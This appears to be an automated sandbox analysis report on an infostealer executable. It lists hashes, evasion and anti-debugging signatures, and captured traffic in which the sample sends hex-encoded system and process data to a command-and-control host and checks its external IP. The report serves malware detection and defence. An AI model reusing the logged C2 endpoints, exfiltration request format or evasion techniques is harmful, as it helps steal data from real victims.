Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yqUQPPp0LM.exe

Overview

General Information

Sample name:yqUQPPp0LM.exe
renamed because original name is a hash value
Original sample name:00dacdc02143f49ba6542161592fea9d.exe
Analysis ID:1582700
MD5:00dacdc02143f49ba6542161592fea9d
SHA1:cf9c6420db557dad6b86ca800d14cb8cba120657
SHA256:be0554ab88f46d8e6b10243d7b28ae2ce724b43224af3954b62d015693089822
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • yqUQPPp0LM.exe (PID: 6812 cmdline: "C:\Users\user\Desktop\yqUQPPp0LM.exe" MD5: 00DACDC02143F49BA6542161592FEA9D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: yqUQPPp0LM.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: yqUQPPp0LM.exeVirustotal: Detection: 46%Perma Link
Source: yqUQPPp0LM.exeReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: yqUQPPp0LM.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0085DCF0
Source: yqUQPPp0LM.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0089A5B0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0089B560
Source: yqUQPPp0LM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0083255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0083255D
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008329FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 502551Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 38 32 34 35 32 39 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008FA8C0 recvfrom,0_2_008FA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
Source: unknownHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 502551Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 38 32 34 35 32 39 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:45:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:45:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ
Source: yqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZE_.u
Source: yqUQPPp0LM.exe, 00000000.00000002.2471420475.0000000001AFE000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: yqUQPPp0LM.exe, 00000000.00000002.2471420475.0000000001AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4
Source: yqUQPPp0LM.exe, 00000000.00000003.2449438646.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471521100.0000000001B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: yqUQPPp0LM.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: yqUQPPp0LM.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: yqUQPPp0LM.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443

System Summary

barindex
PE file contains section with special chars
Source: yqUQPPp0LM.exeStatic PE information: section name:
Source: yqUQPPp0LM.exeStatic PE information: section name: .idata
Source: yqUQPPp0LM.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B874210_3_01B87421
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B8666C0_3_01B8666C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9F46C0_3_01B9F46C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9F46C0_3_01B9F46C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9F46C0_3_01B9F46C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9EAB70_3_01B9EAB7
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B874210_3_01B87421
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B8666C0_3_01B8666C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9F46C0_3_01B9F46C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9F46C0_3_01B9F46C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9F46C0_3_01B9F46C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9EAB70_3_01B9EAB7
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B874210_3_01B87421
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B8666C0_3_01B8666C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9F46C0_3_01B9F46C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9F46C0_3_01B9F46C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9F46C0_3_01B9F46C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9EAB70_3_01B9EAB7
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9EAB70_3_01B9EAB7
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9E9940_3_01B9E994
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9E97A0_3_01B9E97A
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_3_01B9EAC00_3_01B9EAC0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008405B00_2_008405B0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00846FA00_2_00846FA0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008FB1800_2_008FB180
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0086F1000_2_0086F100
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_009000E00_2_009000E0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BBA0000_2_00BBA000
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BBE0500_2_00BBE050
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008962100_2_00896210
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008FE3E00_2_008FE3E0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008FC3200_2_008FC320
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00B844100_2_00B84410
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_009004200_2_00900420
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0083E6200_2_0083E620
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BB47800_2_00BB4780
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0089A7F00_2_0089A7F0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00B967300_2_00B96730
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008FC7700_2_008FC770
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008EC9000_2_008EC900
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008449400_2_00844940
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0083A9600_2_0083A960
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00A06AC00_2_00A06AC0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00AEAAC00_2_00AEAAC0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_0083CBB00_2_0083CBB0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BA8BF00_2_00BA8BF0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00AEAB2C0_2_00AEAB2C
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_009C4B600_2_009C4B60
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BBCC900_2_00BBCC90
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BACD800_2_00BACD80
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BB4D400_2_00BB4D40
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00B4AE300_2_00B4AE30
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008FEF900_2_008FEF90
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008F8F900_2_008F8F90
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00B82F900_2_00B82F90
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00854F700_2_00854F70
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008410E60_2_008410E6
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00B9D4300_2_00B9D430
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BA35B00_2_00BA35B0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00B856D00_2_00B856D0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_00BC17A00_2_00BC17A0
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeCode function: 0_2_008E98800_2_008E9880
